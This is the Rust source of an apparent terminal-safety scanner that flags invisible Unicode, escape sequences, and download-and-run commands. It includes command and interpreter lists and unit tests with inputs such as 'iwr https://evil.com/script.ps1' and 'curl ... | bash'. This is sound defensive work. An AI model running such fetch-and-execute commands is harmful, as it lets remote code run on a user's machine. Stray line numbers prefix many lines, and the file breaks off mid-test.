1use once_cell::sync::Lazy;
2use regex::Regex;
3
4use crate::parse::{self, UrlLike};
5use crate::tokenize::{self, Segment, ShellType};
6
/// Where the scanned text came from; selects which tier-1 pre-filter applies.
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
pub enum ScanContext {
    /// Command text about to be executed (matched against the exec pattern).
    Exec,
    /// Pasted text (matched against the broader paste pattern).
    Paste,
    /// Whole-file scan; `tier1_scan` always returns true for this context.
    FileScan,
}
18
/// Tier-1 patterns and extractor metadata generated at build time into
/// `OUT_DIR/tier1_gen.rs` (see the crate's build script).
#[allow(dead_code)]
mod tier1_generated {
    include!(concat!(env!("OUT_DIR"), "/tier1_gen.rs"));
}
24
/// Returns the IDs of the build-time-generated tier-1 extractors.
pub fn extractor_ids() -> &'static [&'static str] {
    tier1_generated::EXTRACTOR_IDS
}
29
/// Compiled tier-1 pattern for `ScanContext::Exec`; built lazily on first use.
static TIER1_EXEC_REGEX: Lazy<Regex> = Lazy::new(|| {
    Regex::new(tier1_generated::TIER1_EXEC_PATTERN).expect("tier1 exec regex must compile")
});
34
/// Compiled tier-1 pattern for `ScanContext::Paste`; built lazily on first use.
static TIER1_PASTE_REGEX: Lazy<Regex> = Lazy::new(|| {
    Regex::new(tier1_generated::TIER1_PASTE_PATTERN).expect("tier1 paste regex must compile")
});
39
/// Matches scheme URLs (`http`/`https`/`ftp`/`ssh`/`git`) and scp-style
/// `user@host:path` tokens.
static URL_REGEX: Lazy<Regex> = Lazy::new(|| {
    Regex::new(
        r#"(?:(?:https?|ftp|ssh|git)://[^\s'"<>]+)|(?:[a-zA-Z0-9._-]+@[a-zA-Z0-9._-]+:[^\s'"<>]+)"#,
    )
    .expect("url regex must compile")
});
47
/// Aggregate result of [`scan_bytes`]: one boolean per detection category
/// plus per-occurrence details.
pub struct ByteScanResult {
    /// ESC introducing a CSI/OSC/APC/DCS sequence, or a trailing bare ESC.
    pub has_ansi_escapes: bool,
    /// C0 controls other than `\n`/`\t`/ESC, DEL, or a CR not followed by LF.
    pub has_control_chars: bool,
    /// Bidirectional control characters (LRM/RLM, embeddings, isolates).
    pub has_bidi_controls: bool,
    /// Zero-width characters (ZWSP/ZWNJ/ZWJ, BOM not at offset 0, etc.).
    pub has_zero_width: bool,
    /// The input as a whole is not valid UTF-8.
    pub has_invalid_utf8: bool,
    /// Characters in the Unicode tag block U+E0000..=U+E007F.
    pub has_unicode_tags: bool,
    /// Variation selectors (U+FE00..=U+FE0F, U+E0100..=U+E01EF).
    pub has_variation_selectors: bool,
    /// Invisible math operators U+2061..=U+2064.
    pub has_invisible_math_operators: bool,
    /// Near-invisible whitespace (thin/hair space, narrow no-break space).
    pub has_invisible_whitespace: bool,
    /// One entry per individual finding, in input order.
    pub details: Vec<ByteFinding>,
}
61
/// A single suspicious byte or character found by [`scan_bytes`].
pub struct ByteFinding {
    /// Byte offset into the scanned input.
    pub offset: usize,
    /// The first byte at that offset (lead byte for multi-byte characters).
    pub byte: u8,
    /// Decoded codepoint when the finding is a Unicode character; `None` for
    /// raw byte-level findings (escapes, control characters).
    pub codepoint: Option<u32>,
    /// Human-readable description of the finding.
    pub description: String,
}
69
70pub fn tier1_scan(input: &str, context: ScanContext) -> bool {
72 match context {
73 ScanContext::Exec => TIER1_EXEC_REGEX.is_match(input),
74 ScanContext::Paste => TIER1_PASTE_REGEX.is_match(input),
75 ScanContext::FileScan => true,
77 }
78}
79
80pub fn scan_bytes(input: &[u8]) -> ByteScanResult {
82 let mut result = ByteScanResult {
83 has_ansi_escapes: false,
84 has_control_chars: false,
85 has_bidi_controls: false,
86 has_zero_width: false,
87 has_invalid_utf8: false,
88 has_unicode_tags: false,
89 has_variation_selectors: false,
90 has_invisible_math_operators: false,
91 has_invisible_whitespace: false,
92 details: Vec::new(),
93 };
94
95 if std::str::from_utf8(input).is_err() {
97 result.has_invalid_utf8 = true;
98 }
99
100 let len = input.len();
101 let mut i = 0;
102 while i < len {
103 let b = input[i];
104
105 if b == 0x1b {
107 if i + 1 < len {
108 let next = input[i + 1];
109 if next == b'[' || next == b']' || next == b'_' || next == b'P' {
110 result.has_ansi_escapes = true;
111 result.details.push(ByteFinding {
112 offset: i,
113 byte: b,
114 codepoint: None,
115 description: match next {
116 b'[' => "CSI escape sequence",
117 b']' => "OSC escape sequence",
118 b'_' => "APC escape sequence",
119 b'P' => "DCS escape sequence",
120 _ => "escape sequence",
121 }
122 .to_string(),
123 });
124 i += 2;
125 continue;
126 }
127 } else {
128 result.has_ansi_escapes = true;
130 result.details.push(ByteFinding {
131 offset: i,
132 byte: b,
133 codepoint: None,
134 description: "trailing escape byte".to_string(),
135 });
136 }
137 }
138
139 if b == b'\r' {
143 let is_attack_cr = i + 1 < len && input[i + 1] != b'\n';
144 if is_attack_cr {
145 result.has_control_chars = true;
146 result.details.push(ByteFinding {
147 offset: i,
148 byte: b,
149 codepoint: None,
150 description: format!("control character 0x{b:02x}"),
151 });
152 }
153 } else if b < 0x20 && b != b'\n' && b != b'\t' && b != 0x1b {
154 result.has_control_chars = true;
155 result.details.push(ByteFinding {
156 offset: i,
157 byte: b,
158 codepoint: None,
159 description: format!("control character 0x{b:02x}"),
160 });
161 }
162
163 if b == 0x7F {
165 result.has_control_chars = true;
166 result.details.push(ByteFinding {
167 offset: i,
168 byte: b,
169 codepoint: None,
170 description: "control character 0x7f (DEL)".to_string(),
171 });
172 }
173
174 if b >= 0xc0 {
176 let remaining = &input[i..];
178 if let Some(ch) = std::str::from_utf8(remaining)
179 .ok()
180 .or_else(|| std::str::from_utf8(&remaining[..remaining.len().min(4)]).ok())
181 .and_then(|s| s.chars().next())
182 {
183 if is_bidi_control(ch) {
185 result.has_bidi_controls = true;
186 result.details.push(ByteFinding {
187 offset: i,
188 byte: b,
189 codepoint: Some(ch as u32),
190 description: format!("bidi control U+{:04X}", ch as u32),
191 });
192 }
193 if is_zero_width(ch) && !(ch == '\u{FEFF}' && i == 0) {
196 result.has_zero_width = true;
197 result.details.push(ByteFinding {
198 offset: i,
199 byte: b,
200 codepoint: Some(ch as u32),
201 description: format!("zero-width character U+{:04X}", ch as u32),
202 });
203 }
204 if is_unicode_tag(ch) {
206 result.has_unicode_tags = true;
207 result.details.push(ByteFinding {
208 offset: i,
209 byte: b,
210 codepoint: Some(ch as u32),
211 description: format!("unicode tag U+{:04X}", ch as u32),
212 });
213 }
214 if is_variation_selector(ch) {
216 result.has_variation_selectors = true;
217 result.details.push(ByteFinding {
218 offset: i,
219 byte: b,
220 codepoint: Some(ch as u32),
221 description: format!("variation selector U+{:04X}", ch as u32),
222 });
223 }
224 if is_invisible_math_operator(ch) {
226 result.has_invisible_math_operators = true;
227 result.details.push(ByteFinding {
228 offset: i,
229 byte: b,
230 codepoint: Some(ch as u32),
231 description: format!("invisible math operator U+{:04X}", ch as u32),
232 });
233 }
234 if is_invisible_whitespace(ch) {
236 result.has_invisible_whitespace = true;
237 result.details.push(ByteFinding {
238 offset: i,
239 byte: b,
240 codepoint: Some(ch as u32),
241 description: format!("invisible whitespace U+{:04X}", ch as u32),
242 });
243 }
244 i += ch.len_utf8();
245 continue;
246 }
247 }
248
249 i += 1;
250 }
251
252 result
253}
254
/// True for bidirectional control characters: LRM/RLM, the explicit
/// embedding/override controls U+202A..=U+202E, and the isolate controls
/// U+2066..=U+2069.
fn is_bidi_control(ch: char) -> bool {
    ('\u{202A}'..='\u{202E}').contains(&ch)
        || ('\u{2066}'..='\u{2069}').contains(&ch)
        || ch == '\u{200E}'
        || ch == '\u{200F}'
}
272
/// True for zero-width characters: ZWSP/ZWNJ/ZWJ (U+200B..=U+200D), BOM,
/// combining grapheme joiner, soft hyphen, and word joiner.
fn is_zero_width(ch: char) -> bool {
    ('\u{200B}'..='\u{200D}').contains(&ch)
        || matches!(ch, '\u{FEFF}' | '\u{034F}' | '\u{00AD}' | '\u{2060}')
}
286
/// True for characters in the Unicode tag block (U+E0000..=U+E007F), used in
/// invisible-text smuggling.
fn is_unicode_tag(ch: char) -> bool {
    matches!(ch, '\u{E0000}'..='\u{E007F}')
}
291
/// True for variation selectors: VS1-VS16 (U+FE00..=U+FE0F) and the
/// supplementary VS17-VS256 block (U+E0100..=U+E01EF).
fn is_variation_selector(ch: char) -> bool {
    matches!(ch, '\u{FE00}'..='\u{FE0F}' | '\u{E0100}'..='\u{E01EF}')
}
299
/// True for the invisible math operators U+2061..=U+2064 (function
/// application, invisible times/separator/plus).
fn is_invisible_math_operator(ch: char) -> bool {
    matches!(ch, '\u{2061}'..='\u{2064}')
}
305
/// True for near-invisible whitespace: thin space (U+2009), hair space
/// (U+200A), and narrow no-break space (U+202F).
fn is_invisible_whitespace(ch: char) -> bool {
    ch == '\u{2009}' || ch == '\u{200A}' || ch == '\u{202F}'
}
315
316pub fn extract_urls(input: &str, shell: ShellType) -> Vec<ExtractedUrl> {
319 let segments = tokenize::tokenize(input, shell);
320 let mut results = Vec::new();
321
322 for (seg_idx, segment) in segments.iter().enumerate() {
323 let mut url_sources: Vec<&str> = Vec::new();
327 if let Some(ref cmd) = segment.command {
328 url_sources.push(cmd.as_str());
329 }
330 for arg in &segment.args {
331 url_sources.push(arg.as_str());
332 }
333 for source in &url_sources {
334 for mat in URL_REGEX.find_iter(source) {
335 let raw = mat.as_str().to_string();
336 let url = parse::parse_url(&raw);
337 results.push(ExtractedUrl {
338 raw,
339 parsed: url,
340 segment_index: seg_idx,
341 in_sink_context: is_sink_context(segment, &segments),
342 });
343 }
344 }
345
346 let is_docker_cmd = segment.command.as_ref().is_some_and(|cmd| {
349 let cmd_lower = cmd.to_lowercase();
350 matches!(cmd_lower.as_str(), "docker" | "podman" | "nerdctl")
351 });
352 if is_sink_context(segment, &segments) && !is_docker_cmd {
353 for (arg_idx, arg) in segment.args.iter().enumerate() {
354 if let Some(cmd) = &segment.command {
356 if is_output_flag_value(cmd, &segment.args, arg_idx) {
357 continue;
358 }
359 }
360 let clean = strip_quotes(arg);
361 if looks_like_schemeless_host(&clean) && !URL_REGEX.is_match(&clean) {
362 results.push(ExtractedUrl {
363 raw: clean.clone(),
364 parsed: UrlLike::SchemelessHostPath {
365 host: extract_host_from_schemeless(&clean),
366 path: extract_path_from_schemeless(&clean),
367 },
368 segment_index: seg_idx,
369 in_sink_context: true,
370 });
371 }
372 }
373 }
374
375 if let Some(cmd) = &segment.command {
377 let cmd_lower = cmd.to_lowercase();
378 if matches!(cmd_lower.as_str(), "docker" | "podman" | "nerdctl") {
379 if let Some(docker_subcmd) = segment.args.first() {
380 let subcmd_lower = docker_subcmd.to_lowercase();
381 if subcmd_lower == "build" {
382 let mut i = 1;
384 while i < segment.args.len() {
385 let arg = strip_quotes(&segment.args[i]);
386 if (arg == "-t" || arg == "--tag") && i + 1 < segment.args.len() {
387 let tag_val = strip_quotes(&segment.args[i + 1]);
388 if !tag_val.is_empty() {
389 let docker_url = parse::parse_docker_ref(&tag_val);
390 results.push(ExtractedUrl {
391 raw: tag_val,
392 parsed: docker_url,
393 segment_index: seg_idx,
394 in_sink_context: true,
395 });
396 }
397 i += 2;
398 } else if arg.starts_with("-t") && arg.len() > 2 {
399 let tag_val = strip_quotes(&arg[2..]);
400 let docker_url = parse::parse_docker_ref(&tag_val);
401 results.push(ExtractedUrl {
402 raw: tag_val,
403 parsed: docker_url,
404 segment_index: seg_idx,
405 in_sink_context: true,
406 });
407 i += 1;
408 } else if let Some(val) = arg.strip_prefix("--tag=") {
409 let tag_val = strip_quotes(val);
410 let docker_url = parse::parse_docker_ref(&tag_val);
411 results.push(ExtractedUrl {
412 raw: tag_val,
413 parsed: docker_url,
414 segment_index: seg_idx,
415 in_sink_context: true,
416 });
417 i += 1;
418 } else {
419 i += 1;
420 }
421 }
422 } else if subcmd_lower == "image" {
423 if let Some(image_subcmd) = segment.args.get(1) {
425 let image_subcmd_lower = image_subcmd.to_lowercase();
426 if matches!(
427 image_subcmd_lower.as_str(),
428 "pull" | "push" | "inspect" | "rm" | "tag"
429 ) {
430 extract_first_docker_image(
431 &segment.args[2..],
432 seg_idx,
433 &mut results,
434 );
435 }
436 }
437 } else if matches!(subcmd_lower.as_str(), "pull" | "run" | "create") {
438 extract_first_docker_image(&segment.args[1..], seg_idx, &mut results);
440 }
441 }
442 }
443 }
444 }
445
446 results
447}
448
/// One URL-like token found by [`extract_urls`].
#[derive(Debug, Clone)]
pub struct ExtractedUrl {
    /// The token exactly as matched (quotes stripped for schemeless hits).
    pub raw: String,
    /// Structured interpretation of the token.
    pub parsed: UrlLike,
    /// Index of the pipeline segment the token was found in.
    pub segment_index: usize,
    /// True when the enclosing command fetches or executes remote content.
    pub in_sink_context: bool,
}
457
/// Docker CLI flags whose value arrives as the FOLLOWING argument; used to
/// skip flag values while hunting for the image positional argument.
const DOCKER_VALUE_FLAGS: &[&str] = &[
    "--platform",
    "--format",
    "--filter",
    "-f",
    "--label",
    "-l",
    "--name",
    "--hostname",
    "--user",
    "-u",
    "--workdir",
    "-w",
    "--network",
    "--net",
    "--env",
    "-e",
    "--env-file",
    "--publish",
    "-p",
    "--expose",
    "--volume",
    "-v",
    "--mount",
    "--add-host",
    "--device",
    "--entrypoint",
    "--log-driver",
    "--log-opt",
    "--restart",
    "--runtime",
    "--cpus",
    "--cpu-shares",
    "--cpu-quota",
    "--memory",
    "--memory-reservation",
    "--memory-swap",
    "--shm-size",
    "--ulimit",
    "--security-opt",
    "--sysctl",
    "--tmpfs",
    "--gpus",
    "--ipc",
    "--pid",
    "--userns",
    "--cgroupns",
];

/// Short flags that may carry their value inline (e.g. `-p8080:80`).
const DOCKER_VALUE_PREFIXES: &[&str] = &["-p", "-e", "-v", "-l", "-u", "-w"];
510
511fn extract_first_docker_image(args: &[String], seg_idx: usize, results: &mut Vec<ExtractedUrl>) {
513 let mut skip_next = false;
514 for arg in args {
515 if skip_next {
516 skip_next = false;
517 continue;
518 }
519 let clean = strip_quotes(arg);
520 if clean == "--" {
521 break;
522 }
523 if clean.starts_with("--") && clean.contains('=') {
524 continue; }
526 if clean.starts_with('-') {
527 if DOCKER_VALUE_FLAGS.iter().any(|f| clean == *f) {
528 skip_next = true;
529 }
530 if DOCKER_VALUE_PREFIXES
531 .iter()
532 .any(|p| clean.starts_with(p) && clean.len() > p.len())
533 {
534 continue;
535 }
536 continue;
537 }
538 if !clean.contains("://") && clean != "." && clean != ".." && clean != "-" {
539 let docker_url = parse::parse_docker_ref(&clean);
540 results.push(ExtractedUrl {
541 raw: clean,
542 parsed: docker_url,
543 segment_index: seg_idx,
544 in_sink_context: true,
545 });
546 }
547 break; }
549}
550
551fn is_sink_context(segment: &Segment, _all_segments: &[Segment]) -> bool {
553 if let Some(cmd) = &segment.command {
554 let cmd_base = cmd.rsplit('/').next().unwrap_or(cmd);
555 let cmd_lower = cmd_base.to_lowercase();
556 if cmd_lower == "git" {
558 return is_git_sink(segment);
559 }
560 if is_source_command(&cmd_lower) {
561 return true;
562 }
563 }
564
565 if let Some(sep) = &segment.preceding_separator {
567 if sep == "|" || sep == "|&" {
568 if let Some(cmd) = &segment.command {
570 let cmd_base = cmd.rsplit('/').next().unwrap_or(cmd);
571 if is_interpreter(cmd_base) {
572 return true;
573 }
574 }
575 }
576 }
577
578 false
579}
580
/// True when `cmd` (already lowercased by the caller) is a command that
/// fetches remote content.
fn is_source_command(cmd: &str) -> bool {
    const SOURCE_COMMANDS: &[&str] = &[
        "curl", "wget", "http", "https", "xh", "fetch", "scp", "rsync",
        "docker", "podman", "nerdctl", "pip", "pip3", "npm", "npx", "yarn",
        "pnpm", "go", "cargo", "iwr", "irm", "invoke-webrequest",
        "invoke-restmethod",
    ];
    SOURCE_COMMANDS.contains(&cmd)
}
609
610fn is_git_sink(segment: &Segment) -> bool {
613 if segment.args.is_empty() {
614 return false;
615 }
616 for arg in &segment.args {
618 let clean = strip_quotes(arg);
619 if clean.starts_with('-') {
620 continue;
621 }
622 return matches!(
623 clean.as_str(),
624 "clone" | "fetch" | "pull" | "submodule" | "remote"
625 );
626 }
627 false
628}
629
/// True when `cmd` is a shell or script interpreter that executes its stdin.
fn is_interpreter(cmd: &str) -> bool {
    const INTERPRETERS: &[&str] = &[
        "sh", "bash", "zsh", "dash", "ksh", "python", "python3", "node",
        "perl", "ruby", "php", "iex", "invoke-expression",
    ];
    INTERPRETERS.contains(&cmd)
}
647
648fn is_output_flag_value(cmd: &str, args: &[String], arg_index: usize) -> bool {
652 let cmd_lower = cmd.to_lowercase();
653 let cmd_base = cmd_lower.rsplit('/').next().unwrap_or(&cmd_lower);
654
655 match cmd_base {
656 "curl" => {
657 if arg_index > 0 {
658 let prev = strip_quotes(&args[arg_index - 1]);
659 if prev == "-o"
660 || prev == "--output"
661 || prev == "-u"
662 || prev == "--user"
663 || prev == "-U"
664 || prev == "--proxy-user"
665 {
666 return true;
667 }
668 }
669 let current = strip_quotes(&args[arg_index]);
670 if current.starts_with("-o") && current.len() > 2 && !current.starts_with("--") {
671 return true;
672 }
673 if current.starts_with("--output=")
674 || current.starts_with("--user=")
675 || current.starts_with("--proxy-user=")
676 {
677 return true;
678 }
679 false
680 }
681 "wget" => {
682 if arg_index > 0 {
683 let prev = strip_quotes(&args[arg_index - 1]);
684 if prev == "-O"
685 || prev == "--output-document"
686 || prev == "--user"
687 || prev == "--password"
688 || prev == "--http-user"
689 || prev == "--http-password"
690 || prev == "--ftp-user"
691 || prev == "--ftp-password"
692 || prev == "--proxy-user"
693 || prev == "--proxy-password"
694 {
695 return true;
696 }
697 }
698 let current = strip_quotes(&args[arg_index]);
699 if current.starts_with("-O") && current.len() > 2 && !current.starts_with("--") {
700 return true;
701 }
702 if current.starts_with("--output-document=")
703 || current.starts_with("--user=")
704 || current.starts_with("--password=")
705 || current.starts_with("--http-user=")
706 || current.starts_with("--http-password=")
707 || current.starts_with("--ftp-user=")
708 || current.starts_with("--ftp-password=")
709 || current.starts_with("--proxy-user=")
710 || current.starts_with("--proxy-password=")
711 {
712 return true;
713 }
714 false
715 }
716 "http" | "https" | "xh" => {
717 if arg_index > 0 {
718 let prev = strip_quotes(&args[arg_index - 1]);
719 if prev == "-a" || prev == "--auth" {
720 return true;
721 }
722 }
723 let current = strip_quotes(&args[arg_index]);
724 if current.starts_with("--auth=") {
725 return true;
726 }
727 false
728 }
729 _ => false,
730 }
731}
732
/// Trims `s` and removes one matching pair of surrounding quotes (single or
/// double). Lone or mismatched quotes are left as-is.
fn strip_quotes(s: &str) -> String {
    let s = s.trim();
    s.strip_prefix('"')
        .and_then(|rest| rest.strip_suffix('"'))
        .or_else(|| {
            s.strip_prefix('\'')
                .and_then(|rest| rest.strip_suffix('\''))
        })
        .unwrap_or(s)
        .to_string()
}
743
/// Heuristic: does `s` look like a bare `host.tld[/path]` URL with no scheme?
///
/// Rejects flags, dotless tokens, dot-leading names, plain email addresses,
/// hosts with spaces, pathless tokens ending in a known file extension, and
/// hosts whose final label is not a plausible alphabetic TLD.
fn looks_like_schemeless_host(s: &str) -> bool {
    // Flags, dotless tokens, and dot-leading names can never be hosts.
    if s.starts_with('-') || s.starts_with('.') || !s.contains('.') {
        return false;
    }

    // `user@host` with no `:` before the `@` and no `/` after it is an email
    // address, not an scp-style remote.
    if let Some(at_pos) = s.find('@') {
        let (user, rest) = (&s[..at_pos], &s[at_pos + 1..]);
        if !user.contains(':') && !rest.contains('/') {
            return false;
        }
    }

    let host = s.split('/').next().unwrap_or(s);
    if !host.contains('.') || host.contains(' ') {
        return false;
    }

    // A token is only treated as a plain file name when nothing meaningful
    // follows the host (no path, or just trailing slashes).
    let has_meaningful_path = s.find('/').is_some_and(|idx| {
        let tail = &s[idx + 1..];
        !tail.is_empty() && tail != "/"
    });
    if !has_meaningful_path && ends_with_known_file_ext(&host.to_lowercase()) {
        return false;
    }

    let labels: Vec<&str> = host.split('.').collect();
    if labels.len() < 2 {
        return false;
    }
    let tld = labels.last().unwrap();
    (2..=63).contains(&tld.len()) && tld.chars().all(|c| c.is_ascii_alphabetic())
}

/// True when the (lowercased) token ends in a common file extension, which
/// makes it a file name rather than a host.
fn ends_with_known_file_ext(host_lower: &str) -> bool {
    const FILE_EXTS: &[&str] = &[
        ".sh", ".py", ".rb", ".js", ".ts", ".go", ".rs", ".c", ".h", ".txt",
        ".md", ".json", ".yaml", ".yml", ".xml", ".html", ".css", ".tar.gz",
        ".tar.bz2", ".tar.xz", ".tgz", ".zip", ".gz", ".bz2", ".rpm", ".deb",
        ".pkg", ".dmg", ".exe", ".msi", ".dll", ".so", ".log", ".conf",
        ".cfg", ".ini", ".toml", ".png", ".jpg", ".jpeg", ".gif", ".bmp",
        ".ico", ".tiff", ".tif", ".pdf", ".csv", ".mp3", ".mp4", ".wav",
        ".avi", ".mkv", ".flac", ".ogg", ".webm", ".ttf", ".otf", ".woff",
        ".woff2", ".docx", ".xlsx", ".pptx", ".sqlite", ".lock", ".example",
        ".local", ".bak", ".tmp", ".swp", ".orig", ".patch", ".diff", ".map",
        ".env", ".sample", ".dist", ".editorconfig",
    ];
    FILE_EXTS.iter().any(|ext| host_lower.ends_with(ext))
}
870
/// Host part of a schemeless token: everything before the first `/`
/// (or the whole string when there is no path).
fn extract_host_from_schemeless(s: &str) -> String {
    match s.find('/') {
        Some(idx) => s[..idx].to_string(),
        None => s.to_string(),
    }
}
874
/// Path part of a schemeless token: the first `/` and everything after it,
/// or the empty string when there is no path.
fn extract_path_from_schemeless(s: &str) -> String {
    s.find('/').map_or_else(String::new, |idx| s[idx..].to_string())
}
882
#[cfg(test)]
mod tests {
    //! Unit tests covering the tier-1 pre-filter, byte scanning, URL and
    //! docker-ref extraction, quote stripping, and the schemeless-host
    //! heuristics.

    use super::*;

    // --- tier1_scan pre-filter ---

    #[test]
    fn test_tier1_exec_matches_url() {
        assert!(tier1_scan("curl https://example.com", ScanContext::Exec));
    }

    #[test]
    fn test_tier1_exec_no_match_simple() {
        assert!(!tier1_scan("ls -la", ScanContext::Exec));
    }

    #[test]
    fn test_tier1_exec_no_match_echo() {
        assert!(!tier1_scan("echo hello world", ScanContext::Exec));
    }

    #[test]
    fn test_tier1_exec_matches_pipe_bash() {
        assert!(tier1_scan("something | bash", ScanContext::Exec));
    }

    #[test]
    fn test_tier1_exec_matches_pipe_sudo_bash() {
        assert!(tier1_scan("something | sudo bash", ScanContext::Exec));
    }

    #[test]
    fn test_tier1_exec_matches_pipe_env_bash() {
        assert!(tier1_scan("something | env bash", ScanContext::Exec));
    }

    #[test]
    fn test_tier1_exec_matches_pipe_bin_bash() {
        assert!(tier1_scan("something | /bin/bash", ScanContext::Exec));
    }

    #[test]
    fn test_tier1_exec_matches_git_scp() {
        assert!(tier1_scan(
            "git clone git@github.com:user/repo",
            ScanContext::Exec
        ));
    }

    #[test]
    fn test_tier1_exec_matches_punycode() {
        assert!(tier1_scan(
            "curl https://xn--example-cua.com",
            ScanContext::Exec
        ));
    }

    #[test]
    fn test_tier1_exec_matches_docker() {
        assert!(tier1_scan("docker pull malicious/image", ScanContext::Exec));
    }

    #[test]
    fn test_tier1_exec_matches_iwr() {
        assert!(tier1_scan(
            "iwr https://evil.com/script.ps1",
            ScanContext::Exec
        ));
    }

    #[test]
    fn test_tier1_exec_matches_curl() {
        assert!(tier1_scan(
            "curl https://example.com/install.sh",
            ScanContext::Exec
        ));
    }

    #[test]
    fn test_tier1_exec_matches_lookalike_tld() {
        assert!(tier1_scan("open file.zip", ScanContext::Exec));
    }

    #[test]
    fn test_tier1_exec_matches_shortener() {
        assert!(tier1_scan("curl bit.ly/abc", ScanContext::Exec));
    }

    // Paste context is broader: non-ASCII alone triggers it.

    #[test]
    fn test_tier1_paste_matches_non_ascii() {
        assert!(tier1_scan("café", ScanContext::Paste));
    }

    #[test]
    fn test_tier1_paste_exec_patterns_also_match() {
        assert!(tier1_scan("curl https://example.com", ScanContext::Paste));
    }

    #[test]
    fn test_tier1_exec_no_non_ascii() {
        assert!(!tier1_scan("echo café", ScanContext::Exec));
    }

    // --- scan_bytes ---

    #[test]
    fn test_byte_scan_ansi() {
        let input = b"hello \x1b[31mred\x1b[0m world";
        let result = scan_bytes(input);
        assert!(result.has_ansi_escapes);
    }

    #[test]
    fn test_byte_scan_control_chars() {
        let input = b"hello\rworld";
        let result = scan_bytes(input);
        assert!(result.has_control_chars);
    }

    #[test]
    fn test_byte_scan_bidi() {
        let input = "hello\u{202E}dlrow".as_bytes();
        let result = scan_bytes(input);
        assert!(result.has_bidi_controls);
    }

    #[test]
    fn test_byte_scan_zero_width() {
        let input = "hel\u{200B}lo".as_bytes();
        let result = scan_bytes(input);
        assert!(result.has_zero_width);
    }

    #[test]
    fn test_byte_scan_clean() {
        let input = b"hello world\n";
        let result = scan_bytes(input);
        assert!(!result.has_ansi_escapes);
        assert!(!result.has_control_chars);
        assert!(!result.has_bidi_controls);
        assert!(!result.has_zero_width);
    }

    // --- extract_urls ---

    #[test]
    fn test_extract_urls_basic() {
        let urls = extract_urls("curl https://example.com/install.sh", ShellType::Posix);
        assert_eq!(urls.len(), 1);
        assert_eq!(urls[0].raw, "https://example.com/install.sh");
    }

    #[test]
    fn test_extract_urls_pipe() {
        let urls = extract_urls(
            "curl https://example.com/install.sh | bash",
            ShellType::Posix,
        );
        assert!(!urls.is_empty());
        assert!(urls[0].in_sink_context);
    }

    #[test]
    fn test_extract_urls_scp() {
        let urls = extract_urls("git clone git@github.com:user/repo.git", ShellType::Posix);
        assert!(!urls.is_empty());
        assert!(matches!(urls[0].parsed, UrlLike::Scp { .. }));
    }

    #[test]
    fn test_extract_docker_ref() {
        let urls = extract_urls("docker pull nginx", ShellType::Posix);
        let docker_urls: Vec<_> = urls
            .iter()
            .filter(|u| matches!(u.parsed, UrlLike::DockerRef { .. }))
            .collect();
        assert_eq!(docker_urls.len(), 1);
    }

    #[test]
    fn test_extract_powershell_iwr() {
        let urls = extract_urls(
            "iwr https://example.com/script.ps1 | iex",
            ShellType::PowerShell,
        );
        assert!(!urls.is_empty());
    }

    // --- strip_quotes edge cases ---

    #[test]
    fn test_strip_quotes_single_char() {
        assert_eq!(strip_quotes("\""), "\"");
        assert_eq!(strip_quotes("'"), "'");
    }

    #[test]
    fn test_strip_quotes_empty() {
        assert_eq!(strip_quotes(""), "");
    }

    #[test]
    fn test_scan_bytes_bel_vt_del() {
        let input = b"hello\x07world";
        let result = scan_bytes(input);
        assert!(result.has_control_chars);

        let input = b"hello\x0Bworld";
        let result = scan_bytes(input);
        assert!(result.has_control_chars);

        let input = b"hello\x0Cworld";
        let result = scan_bytes(input);
        assert!(result.has_control_chars);

        let input = b"hello\x7Fworld";
        let result = scan_bytes(input);
        assert!(result.has_control_chars);
    }

    #[test]
    fn test_scan_bytes_osc_apc_dcs() {
        let input = b"hello\x1b]0;title\x07world";
        let result = scan_bytes(input);
        assert!(result.has_ansi_escapes);

        let input = b"hello\x1b_dataworld";
        let result = scan_bytes(input);
        assert!(result.has_ansi_escapes);

        let input = b"hello\x1bPdataworld";
        let result = scan_bytes(input);
        assert!(result.has_ansi_escapes);
    }

    #[test]
    fn test_schemeless_long_tld() {
        assert!(looks_like_schemeless_host("example.academy"));
        assert!(looks_like_schemeless_host("example.photography"));
    }

    #[test]
    fn test_segment_index_correct() {
        let urls = extract_urls("curl https://a.com | wget https://b.com", ShellType::Posix);
        for url in &urls {
            assert!(url.segment_index <= 1);
        }
    }

    // --- docker subcommand handling ---

    #[test]
    fn test_docker_build_context_not_image() {
        let urls = extract_urls("docker build .", ShellType::Posix);
        let docker_urls: Vec<_> = urls
            .iter()
            .filter(|u| matches!(u.parsed, UrlLike::DockerRef { .. }))
            .collect();
        assert_eq!(
            docker_urls.len(),
            0,
            "build context '.' should not be treated as image"
        );
    }

    #[test]
    fn test_docker_image_subcmd() {
        let urls = extract_urls("docker image pull nginx", ShellType::Posix);
        let docker_urls: Vec<_> = urls
            .iter()
            .filter(|u| matches!(u.parsed, UrlLike::DockerRef { .. }))
            .collect();
        assert_eq!(docker_urls.len(), 1);
    }

    // Sanity-check invariants of the build-time generated tier-1 tables.
    #[test]
    fn test_tier1_module_boundary_enforcement() {
        let ids = tier1_generated::EXTRACTOR_IDS;
        assert!(!ids.is_empty(), "EXTRACTOR_IDS must not be empty");
        let exec_count = tier1_generated::TIER1_EXEC_FRAGMENT_COUNT;
        let paste_count = tier1_generated::TIER1_PASTE_FRAGMENT_COUNT;
        assert!(exec_count > 0, "Must have exec fragments");
        assert!(
            paste_count >= exec_count,
            "Paste fragments must be superset of exec fragments"
        );
        Regex::new(tier1_generated::TIER1_EXEC_PATTERN)
            .expect("Generated exec pattern must be valid regex");
        Regex::new(tier1_generated::TIER1_PASTE_PATTERN)
            .expect("Generated paste pattern must be valid regex");
    }

    // --- CR / CRLF handling: only a \r NOT followed by \n is an attack ---

    #[test]
    fn test_scan_bytes_trailing_cr_not_flagged() {
        let result = scan_bytes(b"/path\r");
        assert!(
            !result.has_control_chars,
            "trailing \\r should not be flagged"
        );
    }

    #[test]
    fn test_scan_bytes_trailing_crlf_not_flagged() {
        let result = scan_bytes(b"/path\r\n");
        assert!(
            !result.has_control_chars,
            "trailing \\r\\n should not be flagged"
        );
    }

    #[test]
    fn test_scan_bytes_windows_multiline_not_flagged() {
        let result = scan_bytes(b"line1\r\nline2\r\n");
        assert!(
            !result.has_control_chars,
            "Windows \\r\\n line endings should not be flagged"
        );
    }

    #[test]
    fn test_scan_bytes_embedded_cr_still_flagged() {
        let result = scan_bytes(b"safe\rmalicious");
        assert!(
            result.has_control_chars,
            "embedded \\r before non-\\n should be flagged"
        );
    }

    #[test]
    fn test_scan_bytes_mixed_crlf_and_attack_cr() {
        let result = scan_bytes(b"line1\r\nfake\roverwrite\r\n");
        assert!(
